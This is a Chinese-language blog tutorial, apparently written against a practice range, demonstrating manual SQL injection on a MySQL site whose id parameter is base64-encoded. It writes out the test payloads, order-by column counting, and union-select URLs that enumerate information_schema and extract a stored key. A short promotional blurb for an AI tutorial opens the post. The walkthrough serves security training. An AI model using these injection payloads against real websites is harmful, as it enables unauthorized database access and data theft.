SQL注入实战————1、MySQL手工注入实战

无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程!

SQL注入实战

靶场地址:http://219.153.49.228:48204/show.php?id=MQ==

首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密

SQL注入实战————1、MySQL手工注入实战_第1张图片

发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面进行手工注入演示:

说明:下面的URL为了让读者可以看清,所以没有进行URL的base64加密,但是读者在执行前需要对其进行base64加密,之后才可以正常执行!

1、判断是否可以注入:

单引号测试

SQL注入实战————1、MySQL手工注入实战_第2张图片

SQL注入实战————1、MySQL手工注入实战_第3张图片

and 测试

SQL注入实战————1、MySQL手工注入实战_第4张图片

SQL注入实战————1、MySQL手工注入实战_第5张图片

SQL注入实战————1、MySQL手工注入实战_第6张图片

SQL注入实战————1、MySQL手工注入实战_第7张图片

由上判断可以得知存在SQL注入

2、猜解字段长度

order by  2    

SQL注入实战————1、MySQL手工注入实战_第8张图片

SQL注入实战————1、MySQL手工注入实战_第9张图片

order by 3

SQL注入实战————1、MySQL手工注入实战_第10张图片

SQL注入实战————1、MySQL手工注入实战_第11张图片

可以猜到字段长度为2

3、爆数据库名、数据库版本信息

SQL注入实战————1、MySQL手工注入实战_第12张图片

SQL注入实战————1、MySQL手工注入实战_第13张图片

4、爆表名

http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

SQL注入实战————1、MySQL手工注入实战_第14张图片

5、爆字段名

http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

SQL注入实战————1、MySQL手工注入实战_第15张图片

6、爆字段值

http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--

SQL注入实战————1、MySQL手工注入实战_第16张图片

至此得到最后的内容!

如有任何疑问,请使用chat快问,扫码提问!博主闭关阶段!

你可能感兴趣的:(【信息安全】,【高级专题】,———SQL注入)